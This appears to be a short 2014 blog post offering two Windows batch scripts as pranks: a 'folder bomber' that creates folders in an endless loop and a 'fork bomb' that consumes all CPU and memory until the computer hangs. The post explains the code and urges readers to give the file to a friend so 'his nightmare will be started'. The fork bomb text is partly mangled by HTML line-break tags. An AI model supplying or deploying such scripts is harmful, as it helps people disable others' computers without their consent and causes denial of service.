Tuesday, 7 October 2014

Folder Bomber

This batch file will create 3000+ folder in less than a minute.
Open your notepad and type the following codes.
@echo off
:top
md %random%
goto top

Save it as 3000.bat
Give this file to your friend and when he will click on that his nightmare will be started.

Above Code Explained.
@echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and

%random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.

Fork Bomber▼

It is another batch file which ulitises 100% computer resources and memory making your computer irresponsive and at last your compuer hangs. Just copy and paste

the below codes and save it as fork.bat
:s<br />start %0<br />%0|%0<br />goto :s<br />

No comments:

Post a Comment